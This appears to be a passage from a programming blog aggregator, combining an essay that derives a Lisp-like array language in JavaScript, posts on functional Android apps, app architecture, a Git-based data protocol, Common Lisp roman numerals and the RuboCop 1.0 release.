    return parseInstruction(body, newVariables);
  };
};

When we find a fn instruction, we run parseFnInstruction. This produces a new javascript function. We would replace drawTriangle here with that function:

["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"]

So when that function is run, values would become:

[{ x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"]

After that,

const newVariables = {...oldVariables, ...mapArgsWithValues(args, values)}

Would create a new variables object, that includes a mapping of the function arguments to these newly provided values:

const newVariables = {
  ...oldVariables,
  left: { x: 0, y: 0 }, 
  top: { x: 3, y: 3 },
  right: {x: 6, y: 0 }, 
  color: "blue", 
}

Then, we can take the function body, in this case:

      [
        "do",
        ["drawLine", "left", "top", "color"],
        ["drawLine", "top", "right", "color"],
        ["drawLine", "left", "right", "color"],
      ],

And run it through parseInstruction, with our newVariables. With that "left" would be looked up as a variable and map to {x: 0, y: 0}.

If we did that, voila, the major work to support functions would be done!

Extreme Power: Execution

Let’s follow through on our plan. The first thing we need to do, is to have parseInstruction accept variables as an argument. To do that, we need to update parseInstruction, and wherever it&aposs called:

  const parseInstruction = (ins, variables) => {
    ...
    return fn(...args.map((arg) => parseInstruction(arg, variables)));
  };
  parseInstruction(instruction, variables);

Next, we’ll want to add a special check to detect if we have a “fn” instruction:

  const parseInstruction = (ins, variables) => {
    ...
    const [fName, ...args] = ins;
    if (fName == "fn") {
      return parseFnInstruction(...args, variables);
    }
    ...
    return fn(...args.map((arg) => parseInstruction(arg, variables)));
  };
  parseInstruction(instruction, variables);

Now, our parseFnInstruction:

const mapArgsWithValues = (args, values) => { 
  return args.reduce((res, k, idx) => {
    res[k] = values[idx];
    return res;
  }, {});
}
const parseFnInstruction = (args, body, oldVariables) => {
  return (...values) => {
    const newVariables = {...oldVariables, ...mapArgsWithValues(args, values)}
    return parseInstruction(body, newVariables);
  };
};

It works exactly like we said. We return a new function. When it’s run, it:

  1. Creates a newVariables object, that associates the args with values
  2. runs parseInstruction with the body and the new variables object

Okay, almost done. The final bit to make it all work:

  const parseInstruction = (ins, variables) => {
    ...
    const [fName, ...args] = ins;
    if (fName == "fn") {
      return parseFnInstruction(...args, variables);
    }
    const fn = fns[fName] || variables[fName];
    return fn(...args.map((arg) => parseInstruction(arg, variables)));

The secret is this:

    const fn = fns[fName] || variables[fName];

Here, since fn can now come from both fns and variables, we check both. Put it all together, and it works!

websocket.onMessage(data => { 
  const variables = {};
  const fns = {
    drawLine: drawLine,
    drawPoint: drawPoint,
    rotate: rotate,
    do: (...args) => args[args.length - 1],
    def: (name, v) => {
      variables[name] = v;
    },
  };
  const mapArgsWithValues = (args, values) => {
    return args.reduce((res, k, idx) => {
      res[k] = values[idx];
      return res;
    }, {});
  };
  const parseFnInstruction = (args, body, oldVariables) => {
    return (...values) => {
      const newVariables = {
        ...oldVariables,
        ...mapArgsWithValues(args, values),
      };
      return parseInstruction(body, newVariables);
    };
  };
  const parseInstruction = (ins, variables) => {
    if (variables[ins]) {
      // this must be some kind of variable
      return variables[ins];
    }
    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0 y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    if (fName == "fn") {
      return parseFnInstruction(...args, variables);
    }
    const fn = fns[fName] || variables[fName];
    return fn(...args.map((arg) => parseInstruction(arg, variables)));
  };
  parseInstruction(instruction, variables);
})

Holy jeez, with just this code, we can parse this:

[
  "do",
  [
    "def",
    "drawTriangle",
    [
      "fn",
      ["left", "top", "right", "color"],
      [
        "do",
        ["drawLine", "left", "top", "color"],
        ["drawLine", "top", "right", "color"],
        ["drawLine", "left", "right", "color"],
      ],
    ],
  ],
  ["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"],
  ["drawTriangle", { x: 6, y: 6 }, { x: 10, y: 10 }, { x: 6, y: 16 }, "purple"],
])

We can compose functions, we can define variables, and we can even create our own functions. If we think about it, we just created a programming language! 1.

Try it out

Here’s an example of our triangle 🙂

And here’s a happy person!

Surprises

We may even notice something interesting. Our new array language has advantages to JavaScript itself!

Nothing special

In JavaScript, you define variables by writing const x = foo. Say you wanted to “rewrite” const to be just c. You couldn’t do this, because const x = foo is special syntax in JavaScript. You’re not allowed to change that around.

In our array language though, there’s no syntax at all! Everything is just arrays. We could easily write some special c instruction that works just like def.

If we think about it, it’s as though in Javascript we are guests, and we need to follow the language designer’s rules. But in our array language, we are “co-owners”. There is no big difference between the “built-in” stuff (“def”, “fn”) the language designer wrote, and the stuff we write! (“drawTriangle”).

Code is Data

There’s another, much more resounding win. If our code is just a bunch of arrays, we can do stuff to the code. We could write code that generates code!

For example, say we wanted to support unless in Javascript.

Whenever someone writes

unless foo { 
   ...
}

We can rewrite it to

if !foo { 
   ...
}

This would be difficult to do. We’d need something like Babel to parse our file, and work on top of the AST to make sure we rewrite our code safely to

if !foo { 
  ...
}

But in our array language, our code is just arrays! It’s easy to rewrite unless:

function rewriteUnless(unlessCode) {
   const [_unlessInstructionName, testCondition, consequent] = unlessCode; 
   return ["if", ["not", testCondition], consequent]
}
rewriteUnless(["unless", ["=", 1, 1], ["drawLine"]])
// => 
["if", ["not", ["=", 1, 1]], ["drawLine"]];

Oh my god. Easy peasy.

Editing with Structure

Having your code represented as data doesn’t just allow you to manipulate your code with ease. It also allows your editor to do it too. For example, say you are editing this code:

["if", testCondition, consequent]

You want to change testCondition to ["not", testCondition]

You could bring your cursor over to testCondition

["if", |testCondition, consequent]

Then create an array

["if", [|] testCondition, consequent]

Now you can type “not”

["if", ["not", |] testCondition, consequent]

If your editor understood these arrays, you can tell it: “expand” this area to the right:

["if", ["not", testCondition], consequent]

Boom. Your editor helped your change the structure of your code.

If you wanted to undo this, You can put your cursor beside testCondition,

["if", ["not", |testCondition], consequent]

and ask the editor to “raise” this up one level:

["if", testCondition, consequent]

All of a sudden, instead of editing characters, you are editing the structure of your code. This is called structural editing 2. It can help you move with the speed of a potter, and is one of the many wins you’ll get when your code is data.

What you discovered

Well, this array language you happened to have discovered…is a poorly implemented dialect of Lisp!

Here’s our most complicated example:

[
  "do",
  [
    "def",
    "drawTriangle",
    [
      "fn",
      ["left", "top", "right", "color"],
      [
        "do",
        ["drawLine", "left", "top", "color"],
        ["drawLine", "top", "right", "color"],
        ["drawLine", "left", "right", "color"],
      ],
    ],
  ],
  ["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"],
  ["drawTriangle", { x: 6, y: 6 }, { x: 10, y: 10 }, { x: 6, y: 16 }, "purple"],
])

And here’s how that looks in Clojure, a dialect of lisp:

(do 
  (def draw-triangle (fn [left top right color]
                       (draw-line left top color)
                       (draw-line top right color)
                       (draw-line left right color)))
  (draw-triangle {:x 0 :y 0} {:x 3 :y 3} {:x 6 :y 0} "blue")
  (draw-triangle {:x 6 :y 6} {:x 10 :y 10} {:x 6 :y 16} "purple"))

The changes are cosmetic:

  • () now represent lists
  • We removed all the commas
  • camelCase became kebab-case
  • Instead of using strings everywhere, we added one more data type: a symbol
    • A symbol is used to look stuff up: i.e "drawTriangle" became draw-triangle

The rest of the rules are the same:

(draw-line left top color)

means

  • Evaluate left, top, color, and replace them with their values
  • Run the function draw-line with those values

Discovery?

Now, if we agree that the ability to manipulate source code is important to us, what kind of languages are most conducive for supporting it?

One way we can solve that question is to rephrase it: how could we make manipulating code as intuitive as manipulating data within our code? The answer sprouts out: Make the code data! What an exciting conclusion. If we care about manipulating source code, we glide into the answer: the code must be data 3.

If the code must be data, what kind of data representation could we use? XML could work, JSON could work, and the list goes on. But, what would happen if we tried to find the simplest data structure? If we keep simplifying, we glide into to the simplest nested structure of all…lists!

This is both illuminating and exciting.

It’s illuminating, in the sense that it seems like Lisp is “discovered”. It’s like the solution to an optimization problem: if you care about manipulating code, you gravitate towards discovering Lisp. There’s something awe-inspiring about using a tool that’s discovered: who knows, alien life-forms could use Lisp!

It’s exciting, in that, there may be a better syntax. We don’t know. Ruby and Python in my opinion were experiments, trying to bring lisp-like power without the brackets. I don’t think the question is a solved one yet. Maybe you can think about it 🙂

Fin

You can imagine how expressive you can be if you can rewrite the code your language is written in. You’d truly be on the same footing as the language designer, and the abstractions you could write at that level, can add up to save you years of work.

All of a sudden, those brackets look kind of cool!


Thanks to Daniel Woelfel, Alex Kotliarskyi, Sean Grove, Joe Averbukh, Irakli Safareli, for reviewing drafts of this essay

1

We can, of course, write the Y Combinator with it too!

2

Cursive’s doc has a great demo of this.

3

JavaScript has tried to support macros with sweet.js for example. However, you can see that manipulating source code there is still less intuitive than manipulating data with your code.

Permalink

Ep 087: Polymorphic Metal

Each week, we discuss a different topic about Clojure and functional programming.

If you have a question or topic you’d like us to discuss, tweet @clojuredesign, send an email to feedback@clojuredesign.club, or join the #clojuredesign-podcast channel on the Clojurians Slack.

This week, the topic is: “multimethods.” We discuss polymorphism and how we tackle dynamic data with families of functions.

Selected quotes:

  • “You don’t have to reach for polymorphism as quickly in Clojure.”
  • “Polymophism at its simplist.”
  • “A natural fit for processing a list of heterogeneous things.”
  • “Our natural tool of computation: the function.”

Links:

Permalink

Approaching Pure Functional Programming in Android Apps

Is it possible to write pure functional android apps? Many argue for flutter, react native, and lately jetpack compose due to their declarative style, but are they really necessary, or can we do the same by utilising the full power of the android ecosystem?

I will not go much into what functional programming is. There are already many blog posts about replacing var with val, use LiveData as atoms instead of var, copying objects instead of mutating them etc. They solve a lot of problems, but they're not truly functional. Unless you know what you are doing, your MutableLiveData might as well be a var and your .copy() might as well be a mutation.

We will approach the topic using this app as an example: Phrase Reminder.
It’s a very simple app where you can save phrases and their translation while learning a language.

https://medium.com/media/c0b9c63edc51386561367a031bfde518/href

The full source of the app is here: https://github.com/TorkelV/PhraseReminder
It has many more features and has been refactored many times since writing this article, in a continuous effort to make it as functional as possible.

Let’s code

First off we need a simple project with a main activity to show a fragment. I will assume you already know how to do that.

We create a simple domain model:

https://medium.com/media/06395324e324d5d3a3790dd24d15395e/href

We need a database to save our phrases:

https://medium.com/media/fcd56c4e9e9e9ab3b26465d0480c05f6/href

We setup a simple preferenceService with the recently released androidx DataStore:

https://medium.com/media/74ed3d530af854df6454f3167bea5cbe/href

We need a view model:

https://medium.com/media/5cf47b4bcd601389abc97848e07da6ae/href

We need some DI to inject our stuff:

https://medium.com/media/266b363d396aa4503ba46c6686a97328/href

Let’s enable data binding and set up a layout and bind our viewmodel:

https://medium.com/media/ea178eaad4a8870c399abaae5d97e61b/href

And create our Fragment and hook up the binding.

https://medium.com/media/905901ce9a28fcf54379085fbfd13058/href

Some pretty standard stuff so far..

Let’s modify our viewModel a bit, to get the current group and the phrases from that group.

https://medium.com/media/10a17ea240f4092d72996225fdf950ab/href

Now think about where you want to go from here. We have a database. We have databinding set up, we have a preference service that can return flows. We have our phrases flowing into the viewModel from the db, and it automatically filters them based on the active group!

Do you think we need to write an adapter to show our phrases?

Nope.

First off let’s add this dependency:

implementation("me.tatarka.bindingcollectionadapter2:bindingcollectionadapter-recyclerview:4.0.0")

Create a layout to display a phrase(simplified):

https://medium.com/media/572bf4aa71e80d46ac1a5aca942cc51b/href

Add an ItemBinding to our viewmodel.

https://medium.com/media/2865ed38a5bbfb27da6ac8e4d331e7ec/href

Add itemBinding and items to the recyclerView in our fragment layout:

https://medium.com/media/768b6e115dd5d641afbb51a4cbda1e2f/href

Now we have our phrases essentially flowing into the recycler view. Even though the db is empty at the moment. Let’s add some phrases!

Simply add two MutableLiveData to the view model:

https://medium.com/media/af53858b95193058d54fece3cf937d89/href

And two input fields to our fragment layout with an inverse binding:

https://medium.com/media/8bfb2e78d4495f87422dd7b208ebf3fe/href

We add a new function to add a phrase:

https://medium.com/media/2e0e87b9efeafbd1eeedb5e6f1de92d8/href

And add a button to our layout:

https://medium.com/media/05849646d7bf6dd0f4b2a565bd355705/href

You do not necessarily have to create the mutable live data, you could reference the views directly, but this way makes it more clean IMO.
We can for example add a validation function:

Let’s add a livedata extension library to make our job a bit easier:

implementation("com.github.c-b-h:lives:1.0.0")
https://medium.com/media/3758e70f822d2fd05482226776e77327/href

Now we can add android:enabled="@{viewModel.canAddNewPhrase}" to our button.

We could also add a search field in the same manner.

https://medium.com/media/edb53e17ecaced8dd7bbea33cc39d476/href

Just swap out phrases for displayedPhrases in the recycler view and it will show the phrases that contain the search automatically.

Cleaning up a bit

It’s not very nice to have multiple mutable values laying around in the view model. We can refactor it to encapsulate some behaviour.

First we create a separate class for our “view”:

https://medium.com/media/3f1c804a8738155d36de9cf7d1e4d688/href

We don’t tell it where to add a phrase, as we could reuse this component to add sub/related phrases to a phrase later.

We create an instance of this in our view model:

https://medium.com/media/cc4e2b72e65fa126c94fef61ec6038f2/href

Instead of a submit button, we’ll just use an IME action.

First we’ll add a binding adapter for it:

https://medium.com/media/30ddfa8e92a8b1b3227e22460703c373/href

And then we create a layout for the component:

https://medium.com/media/1c2ea5c337a1b5babd02915fab3d115a/href

And include that layout in our fragment layout:

https://medium.com/media/008bec5659cee19118abea38460d7b15/href

Much better 😄 Our view model is cleaner and we have a reusable component that we can more easily test. Though, you could make it even nicer by refactoring the TexInputLayouts to be components as well.

Changing phrase groups:

In phrase reminder we also have multiple lists/groups of phrases, so you can switch between different languages for example. This can be solved similarly to how we added phrases. We could add a drawer menu in the main activity where you can add new groups, and just by callingprefs.setActiveGroup(id) the group flow in our fragment view model will emit a new value, the phrases query will be run again and our view will automatically be updated with the phrases in that group. In that way the activity and fragment is fully decoupled, but can still “communicate” through the data store.

What’s the point?

In these examples we do no side effects on our app state directly. The only side effects happening are text inputs coming from the view. All the other side effects happen inside of the database (though sometimes exceptions to this is necessary, for example when you want to hide/show a view based on an action, but you don’t want it to persist. In that case we try to encapsulate it as much as possible.)

There is no init { loadPhrases() } or similar code, where you have to deal with updating/refreshing data after updates. We do not modify our intermediate state, it is only refreshed through a flow from our repository.
We do not rely on custom observers and we do not modify the view outside of binding adapters. We do not deal with custom adapters or deal with any intermediate state outside of the viewModel.

If you set up a gRPC API and use streams, you could write the code in the same way, the only difference would be the repository location.

The same goes for Firestore, you could create a callback flow from a snapshot listener and achieve the same functionality.

Conclusion

As long as all data is flowing into your view model, and mutations only happen remotely and are then flowing back into your app, you can essentially write everything else with pure functions. Is it practical however? Probably not. Some side effects are just better off being placed in intermediate state, and then we have to call that void function that just changes an in-memory boolean. I still it’s beneficial to think in a functional way whenever you implement anything, and I would strongly recommend trying to learn a language like Clojure for example if you want get into that mindset.

Anyway, we have shown that by only using the android SDK we can write fully reactive applications that have nearly all the perks of the declarative frameworks, while still keeping all the perks of the non declarative world and all native features.

This is neither just an experiment. In the apps I develop I do not write more than a few lines of code in any fragment or activity, everything can be solved reactively through the view model and binding adapters.

👋 If there is any interest in this post, I might write a part 2 expanding on the topic with more complex examples.

In the meantime you can check out the source of PhraseReminder: https://github.com/TorkelV/PhraseReminder


Approaching Pure Functional Programming in Android Apps was originally published in The Startup on Medium, where people are continuing the conversation by highlighting and responding to this story.

Permalink

My Project Umbrella

Last Updated on October 22, 2020 by Brad Cypert

I was talking with a friend the other day about Flutter for Web’s SEO, which… is not very good. He asked if I was concerned about search engines not being able to find my app to which I said “No.” My Flutter app is behind a login, so Google wouldn’t be able to index anything behind the login anyways, but that’s not why I’m not concerned. I still want people to find my app, but I handle how they find the app in a way that separates several different concerns. I call it my “Project Umbrella”.

When I build an “App”, there are three other projects that roll up into that “App” (I also refer to this as the Brand). For example, Bluejay.app consists of three pieces — A web server, a client side application, and a marketing site. These three subprojects make up my standard project (or Brand) at this point.

With Bluejay, I don’t want search engines to index my API (why would I?) and my client side application contains data specific to whoever is logged in (also something that I don’t want indexed for privacy reasons). However, I do want people to stumble upon the project, the project’s blog posts, and similar pages.

The tech side of this is extremely simple (at a high level). I have a web server written in Go. I have a client side application written in React. I have a marketing site built with Gatsby. This separation of concerns means a lot to me (and ideally my users). It means that my marketing materials don’t get shipped alongside my app (you don’t need to download my marketing images and content if you just want to use the app). Additionally, since the client apps and backend servers are separated, I’m not spending CPU cycles on serving static assets or stitching together web pages with some templating library.

My Go server only responds to GraphQL and will only render GraphQL JSON responses. My client side app is served via Netlify and their CDN, which helps me get insanely fast load times. In this project, the marketing site is a static website that is also served via Netlify for the same reason.

The Flutter app that started this conversation follows the same pattern, although the tech is slightly different. On the web server side, I’m currently using Firebase for storage, firestore, and functions. On the client side, I build out an extremely not-SEO-friendly Flutter web app, and an iOS and Android app. To keep everything close, I chose to use Firebase to deploy the Flutter web app, although Netlify would work here too. Finally, the marketing site is WordPress, although it could be Gatsby, plain HTML, or whatever.

Separating my concerns out like this makes it extremely easy to overhaul one piece of the Brand/Project without drastically effecting the other pieces. For example, if I want to swap React for Vue, I only have to do that on the client-side project. More interestingly, if I swap React for ClojureScript, I only have to do that in the client side project, and I don’t have to modify any additional build pipelines (or find a way to make my web server compile Clojure to JavaScript on the fly).

Accessing the Subprojects

The golden standard that I follow that allows this work is actually fairly straightforward. My projects are linked and communicate with their partner projects by three things: DNS Entries, HyperLinks, and JSON as the communication standard.

Generally, I follow the idea that my marketing site should live at “www.xyz.com”, my app should live at “app.xyz.com” and my server-side API lives at “api.xyz.com”. There are some exceptions to this, however. Notably, if I end up buying a .app domain instead of a .com domain, “app.xyz.app” feels weird. Bluejay and Luna Journal are both good examples of this. Here’s how I structure their DNS records:

  • Bluejay:
  • Luna Journal
    • Marketing site lives at www.lunajournal.app
    • The API is handled by Firebase and I do not have to manage DNS records for it
    • The client side (web) application lives at my.lunajournal.app
      • I chose “my” specifically because Luna Journal helps you manage your pet’s information.
    • The mobile apps are available via the App Store.

Why?

I understand that there are dozens (hundreds, maybe?) of other ways to effectively build Web/Mobile apps and the services that support them. I’ve found that this pattern works best for me, as it helps me build apps that support my values and beliefs.

Namely, I believe that I should be able to separate my client side from the web server for scalability and decoupling reasons. I also believe that your client-side experience should be fast. Marketing sites are full of images and images drastically increase the size of a webpage. Finally, I believe that I shouldn’t be the reason you hit your mobile phone’s data cap. Building my applications in this way helps me ensure that I code against my values and ensure that, as a user, you get a fast, considerate experience that scales well under pressure.

The post My Project Umbrella appeared first on Brad Cypert.

Permalink

How Git Could Help Save the Open Web

I think we need a protocol for storing and accessing an individual's data on the web. If it became widely adopted, open-source web applications would become more prevalent, and we'd be able to achieve the goals described in Protocols, Not Platforms.

Here's a simple proposal which I'll call GitCMS. It relies on Git, EDN, and Clojure Spec.

(For those unfamiliar with Clojure: EDN is basically an improved version of JSON, and Spec is a language for defining schemas.)

Core proposal

Storage and data model

Each user has at least one Git repo, in which each file contains a single document. The document is stored as an EDN map, optionally followed by a blank line and some text. For example, my repo might contain a blog post in the file /blog/some-blog-post:

{:type      :article
 :title     "Some Blog Post"
 :published #inst "2020-10-10"}

Lorem ipsum dolor sit amet...

When reading, this file would be deserialized to:

{:type      :article
 :title     "Some Blog Post"
 :published #inst "2020-10-10"
 :path      "/blog/some-blog-post"
 :text      "Lorem ipsum dolor sit amet..."}

:path is the primary key.

These documents could be used for any kind of data. Besides modeling content you've created, you could model other content you've interacted with. If you like a Tweet, you might model that like so:

{:path   "/events/<some uuid>"
 :type   :rating
 :url    "..."
 :rating :like
 :date   #inst "..."}

For large files like images or videos, or frequently changing files like collaborative documents, you could store just the metadata and a foreign key/URL pointing to the content.

The community could maintain a special repository that contains schemas, defined with Spec. For example:

(ns example.schemas
  (:require
    [clojure.spec.alpha :as s]))

(s/def :article/type #{:article})
(s/def ::title string?)
(s/def ::article
  (s/keys :req-un [:article/type
                   ::title
                   ...]))

In English: to be an article, a document must have a :type key set to :article, it must have a :title key set to a string, etc.

So if you want to make an application that publishes a user's blog posts, you would filter through their repo for any documents that match the spec for articles.

(If your app is written in Clojure, you can use the official Spec definitions directly, but that's not required. They're just a reference implementation. The schemas don't even have to be written with Spec, but that seems like a flexible, concise, unambiguous way to do it.)

Access

To make an application that reads GitCMS data, just ask the user for their repo's URL. If you need write access, ask the user for an SSH key (on Github, "Deploy key"). As a user, you can make additional repos for more granular access control (e.g. besides a public repo, you could have a private repo which requires an SSH key for read access).

For more convenient and finer-grained control, there could be applications which have full access to your repo and provide an OAuth API for other apps. These API layers could do more things too, like maintain an index of your data in order to provide efficient queries. The specifics don't need to be part of the GitCMS protocol.

Git also lends itself well to change data capture. Applications can poll (or use Git hooks) for new commits. Given a batch of new commits, you can easily see which documents have been created, updated or deleted.

Benefits

Do one thing and do it well

I'll use Jira as an example. Jira was not loved at my previous job. My project manager said it was popular mainly because it was the only issue tracker that did everything. (If you disagree, think of some other web app that does many things poorly).

With GitCMS, you can easily have multiple apps that operate on the same data, without API integrations. You could have one app for creating new issues and a separate app for displaying those issues. Poor features, instead of being tolerated, can be replaced with small, specialized apps.

This would also lower the barrier to entry for individual developers and startups: instead of having to make an app that's good enough to displace an incumbent, you can make a small app that only replaces one feature. And you can do this without plugging into (and thus, becoming dependent on) a commercial platform.

Open data

Information discovery is one of the most important problems of our time. If everyone used GitCMS to store data about content they like and don't like, then anyone could use it to build search engines, recommender systems and social networks.

Adoption

Getting people to use any new protocol is hard, but I think GitCMS has a real chance to succeed. Git is widely used and understood, and there's plenty of free hosting. Plus it's convenient for developers: you can perform CRUD operations with just a text editor. Even without widespread adoption, GitCMS would be a nice data storage format for many side projects, like static site generators. GitCMS will benefit from network effects, but it can get started without them.

If GitCMS becomes popular among developers, it can spread to non-technical people with some extra work. At the least, we would need a hosting service designed for this purpose instead of GitHub et. al.

The choice of EDN instead of JSON will probably hinder adoption, except among Clojure programmers. However I think the advantages of EDN are significant, and switching to it late-stage would be difficult. So I'm confident that this indulgence is worth it. It'd be good to survey the state of EDN implementations and see if any could use some help.

I personally got chills when the idea for GitCMS coalesced in my mind, so I'll be using it for my future side projects (which I will no doubt promote as "X, built on GitCMS"). I'll also let Findka users expose their favorited articles in an RSS feed, which can then be auto-imported into GitCMS. If you want to use GitCMS, let me know (you can find contact info and social media profiles on my website). If others are interested, I could set up a mailing list.

Permalink

Standard Joke

Arabic-to-Roman number conversion is a common programming exercise, often used as a TDD exercise. It is an exercise on many Exercism.IO1 language tracks including my own track for Common Lisp2.

So how do you solve this in some arbitrary programming language?

Typically people write some code to loop through a mapping of numeric values to roman numeral digits and do repeated decrements while accumulating the roman numeral digits. That is to say if you start with 1970 and your mapping contains 1000 => "M"; 900 => "CM"; 500 = "D" you decrement by 1000 and accumulate "M", then since the resulting number is under 1000 you try the next mapping, decrement by 900 and accumulate "CM" etc.

How do you do this in Common Lisp?

(format t "~@r" 1970)

Yes: Built. In. To. The. Language. (In fact using ~@:r will provide output as using the alternate roman numeral format which does not have special cases for numbers like 4. i.e. it will output “IIII” rather than “IV”.)

Common Lisp3 is a language with an ANSI specification4. The specification process went from the early-to-mid 1980’s to the mid-1990s. Its goal was to create a single “common” Lisp collecting the good bits from all the splintered Lisp languages used at the time. I’ve heard that it involved a good amount of “horse-trading” as each interested party tried to get the resulting language to contain their special or idiosyncratic feature. So how did it come to have this odd feature?

With a little digging I have found the real story: It was a joke.

In “The Evolution of Lisp”5 Richard Gabriel explains that in 1974 Guy Steele Jr put roman numeral handling into MacLisp6 as a hack. BASE and IBASE were variables which specified the output and input bases for numbers. Before his hack they were limited to vales between 2 and 36. Steele added the ability for them to be set to ROMAN. Thus if set code like (+ i 1) would evaluate to ii since the expression would have been read in as the equivalent of (+ 1 1) and upon output the value 2 would be represented in roman numerals. (It seems in the original announcement of this ‘feature’ that you could also set BASE and IBASE to CUNEIFORM which would cause your Lisp to become wedged. Oh so witty.)

From that time this feature became a bit of a traditional hack - being ported to ZetaLisp7 as part of FORMAT.

Thus when Common Lisp was being created this feature was included in FORMAT8 as it was a normal feature of that function in the Lisps that Common Lisp was being aggregated from.

Since then this feature also found its way into Clojure9 as part of its cl-format10 function.


  1. https://exercism.io/my/tracks 

  2. https://exercism.io/my/tracks/common-lisp 

  3. https://en.wikipedia.org/wiki/Common_Lisp 

  4. https://webstore.ansi.org/Standards/INCITS/INCITS2261994S2008 

  5. https://www.dreamsongs.com/Files/HOPL2-Uncut.pdf p80 

  6. https://en.wikipedia.org/wiki/Maclisp 

  7. https://en.wikipedia.org/wiki/Lisp_Machine_Lisp 

  8. http://l1sp.org/cl/format 

  9. https://clojure.org 

  10. https://clojuredocs.org/clojure.pprint/cl-format 

Permalink

RuboCop 1.0

If at first you don’t succeed, call it version 1.0.

RuboCop’s development started exactly 7 and half years ago. I made the first commit on April 21, 2012. That’s a lot of time in general, but even more in the fast moving world of IT. During this long period we’ve racked up some impressive numbers:

  • 9905 commits
  • 152 releases
  • around 3500 closed issues
  • almost 5000 merged pull requests
  • over 120 million downloads
  • over 200 publicly available related gems (extensions, custom configurations, etc)
  • over 700 contributors

I never expected any of this on April 21, 2012. If there’s a person truly surprised by the success of RuboCop that’d be me. But wait, there’s more! We also reached some important milestones in the last couple of years:

  • Created the RuboCop HQ organization that became the home for RuboCop, the community style guides, and many popular RuboCop extensions
  • Extracted the Rails cops to a separate gem (rubocop-rails)
  • Extracted the performance cops to a separate gem (rubocop-performance)
  • Extracted the AST-related functionality to a separate gem (rubocop-ast)
  • Created new extensions focused on Rake (rubocop-rake) and Minitest (rubocop-minitest)
  • Made significant improvements to RuboCop’s code formatting capabilities
  • Reworked the cop API
  • Switched to safe-only cops by default
  • Introduced the notion of “pending” cops
  • Created a brand new documentation site
  • Provided more polished versions of the community style guides over at https://rubystyle.guide

One thing eluded us, though - a “stable” RuboCop release. Today this finally changes with RuboCop 1.0!1

There’s nothing ground-breaking about the new RuboCop release - it’s almost the same as RuboCop 0.93.1 that preceded it. I believe the only change, that most of you are going to notice, is that all cops that used to be “pending” are now enabled by default, which is in line with our release policy. No new cops will be enabled by default until RuboCop 2.0.

The big news for end users and maintainers of extensions is that we’re finally embracing fully Semantic Versioning, which should make the upgrade process simpler (painless?) for everyone. Going forward the following things will happen only on major releases:

  • enabling of new cops
  • changes to the default cop configuration
  • breaking API changes

It’s really funny that I felt for at least a couple of years that we were very close to the 1.0 release, only to come up with more and more things I wanted to include in it. I believe I first spoke about my intentions to ship RuboCop 1.0 at RubyKaigi 2018 and back then I truly believed this was bound to happen in the next 6 months. Classic example of planning in the software development world, right?

Many people urged me for years to label a random release as 1.0 with the argument that if some software is useful and widely used than it probably deserves that magic moniker. It’s not a bad argument and I totally understood the perspective of those people. I, however, was not convinced as for me version 1.0 also stands for “we got to a place we consider feature complete and aligned with our vision”. Needless to say - the vision we (RuboCop’s team) had was quite ambitious and it took us a while to make it a reality.

I cannot begin to explain how happy I am that we got here, and I can assure you that it wasn’t easy. Over the years RuboCop had its ups and downs, it got a lot of praise, but also a lot of flak.2 Some days I was super pumped and motivated to work on it, on other days I couldn’t stand to think about it. Working on popular OSS projects is one of the most rewarding and most frustrating experiences that one can have. I was (un)fortunate enough to be involved in a few of those (RuboCop, CIDER, nREPL, Projectile, Emacs Prelude, etc) and each one was a crazy roller-coaster ride.

I find it funny how my role in RuboCop evolved with time. Originally I used to write mostly code, these days I write mostly tickets, issue/code review comments and documentation. Often I feel more like a project manager rather than a programmer. There was a time when I was super happy to see a PR and I’d immediately respond to it, now I can’t keep up with all the PRs. In fact, our entire team can’t keep up with them, so consider this my apology that it sometimes takes a while to get feedback on your suggestions. I’ll even admit that I rarely read issue tickets these days as there are so many of them and it’s impossible for me to respond to all of them. I’ve just learned that important tickets always get noticed, if not by me than by someone else from our fantastic team.

I want to extend special thanks to RuboCop’s core team, as we would have never gotten so far without all those amazing people working tirelessly on the project:

You rock, guys!

Jonas, in particular, deserves just as much credit for RuboCop existing today as me. He was the first contributor to RuboCop and he pushed me to get RuboCop to the state where it got critical mass, mindshare and some traction. It’s a long story for another day and another article.3

Koichi also deserves a special mention for his tireless work and incredible dedication to RuboCop and its users over the years! And for his great karaoke skills! He has also been a fantastic head maintainer for key RuboCop extensions like rubocop-rails, rubocop-performance and rubocop-minitest.

Last, but not least - another round of big thanks for all the people who contributed to RuboCop in any capacity over the years! RuboCop is all of you! Keep those contributions coming!

Some closing notes:

  • As mentioned above, recently we’ve extracted RuboCop’s AST-related logic to the rubocop-ast gem, that’s going to be very handy for everything looking to supercharge parser’s API. I’d love to see more tools using it, as I think we really managed to simplify the interaction with an AST. Work on the new gem is led by the awesome Marc-André Lafortune. By the way, he released rubocop-ast 1.0 today! We have some cause for double celebration!
  • The cop API was completely reworked recently by Marc-André. He did some truly fantastic work there! Check out the upgrade notes if you maintain any RuboCop extensions, as the legacy API will be removed in RuboCop 2.0.
  • We’ve made some changes to how department names are calculated that might affect some extensions. Read more about them here.
  • Check out the release notes for all the details.
  • rubocop-rspec is currently not compatible with RuboCop 1.0, but we’re working on this. You can follow the progress on that front here.

And that’s a wrap!

I feel a bit sorry for disappointing everyone who hoped we’d make it to RuboCop 0.99, before cutting RuboCop 1.0. We did our best and we had a great 0.x run, but we ran out of things to do.4 :-) On the bright side - now I can finally say that I’ve got 99 problems (and 200 open issues), but cutting RuboCop 1.0 ain’t one.

Enjoy RuboCop 1.0 and share with us your feedback about it! Our focus now shifts to RuboCop 1.1, and I hope that we’ll be dropping new major releases rather infrequently going forward (although RuboCop 2.0 will probably arrive in less than 7 years). Thanks for your help, love, feedback and support! Keep hacking!

P.S. Koichi recently covered in great details our long journey to RuboCop 1.0 in his presentation Road to RuboCop 1.0 at RubyKaigi 2020. I cannot recommend it highly enough to those of you who’d like to learn more about the technical aspects of RuboCop 1.0 and all the challenges we had to solve along the way!

  1. Also known as the one that will bring balance to the (Ruby) Source. 

  2. In a recent survey RuboCop made both the list of most loved and most hated gems. 

  3. And like any good story it does feature Emacs. 

  4. I’m just kidding. Our plans are as a grand and spectacular as ever! 

Permalink

Ep 086: Let Tricks

